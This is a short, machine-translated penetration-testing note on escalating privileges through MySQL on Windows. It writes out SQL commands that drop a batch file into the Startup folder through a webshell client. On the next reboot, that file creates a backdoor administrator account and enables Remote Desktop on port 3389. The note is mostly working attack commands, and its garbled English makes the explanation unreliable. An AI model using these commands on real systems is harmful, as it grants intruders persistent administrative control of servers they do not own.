Boot mention the right key principles: use mysql, will write back door entry boot from the start. At the same time because it is the boot from the start, and then later write, need to restart the target server. (This requirement mysql permission is high, at least administrator rights and even system)
lab environment
- Windows Server 2008 R2 x64
- MySQL-5.5.15-(64-bit).msi
- kitchen knife
Simulation
Enter a kitchen knife in select "net user zs 123.com /add & net localgroup Administrators zs /add" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"
the implementation
file and double-click to start appearing in, then the user has been created and is the administrators group
can also enter select "net user zs 123.com /add & net localgroup Administrators zs /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 0 /f" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"
the same time open the 3389 port
then you can use a remote connection to your desktop
C: \ Documents and Settings \ Administrator \ "Start" Menu \ Programs \ Startup \ (path of windows2003 and xp)